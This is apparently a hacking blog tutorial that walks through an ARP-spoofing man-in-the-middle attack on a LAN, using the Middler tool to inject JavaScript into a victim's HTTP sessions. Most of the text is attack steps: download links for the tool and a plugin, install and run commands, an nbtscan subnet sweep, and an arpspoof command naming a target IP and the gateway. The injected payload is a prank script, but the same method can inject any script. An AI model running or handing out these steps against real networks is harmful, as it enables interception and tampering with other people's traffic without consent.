
ARP Spoof fun with Middler


While surfing around, I found a nice tool called Middler to have some fun with using ARP spoofing (MITM).

Middler is a tool which can inject JavaScript (js) code into a target’s HTTP session. In this tutorial I’m going to explain how to perform this attack. If you don’t know how ARP spoofing works, check my previous article here. In this case I’m using BackTrack 5. All credit for this tutorial goes to the creator of this tool and to the tutorial by SB91@hackforums.net

Copy the following code into the address bar on your web browser to see what will happen after injection.

[box]javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; var _X = 500; var _Y = 500; var DI= document.images; DIL=DI.length; function A(){for(i=0; i<DIL; i++){DIS=DI[i].style; DIS.position='absolute'; DIS.left=Math.sin(R*x1+i*x2+x3)*x4+_X+"px"; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+_Y+"px";}R++}tag=setInterval('A()',5);document.onmousemove=function(event){_X = event.clientX; _Y = event.clientY;}; void(0)[/box]

You need to download these two files first.

[box]http://dl.dropbox.com/u/35937264/Middler/middler.tar.gz[/box]

[box]http://dl.dropbox.com/u/35937264/Middler/funny_js.py[/box]

After downloading, go to the download folder and enter the following commands.

[box]#tar -xzvf middler.tar.gz (extract middler)[/box]

[box]#cp funny_js.py middler/libmiddler/plugins/http/ (copy the plugin to the directory)[/box]

You need to stop apache2 before starting Middler, because it runs on port 80.

[box]#/etc/init.d/apache2 stop[/box]

Now move to the middler folder and run middler.py.

[box]#cd middler/[/box]

[box]#python middler.py[/box]

Middler is now started. It’s time to inject the JavaScript into a target’s session. Do a network scan to find a target.

[box]#nbtscan 192.168.1.0/24[/box]

Where 192.168.1.0/24 is your subnet.

ARP Spoof the target

[box]#arpspoof -i eth0 -t 192.168.1.10 192.168.1.1[/box]

Where -i is the interface, -t is the target, and the last argument is the gateway.

Now walk to the target machine and browse to www.geeklk.com.

Have fun :p

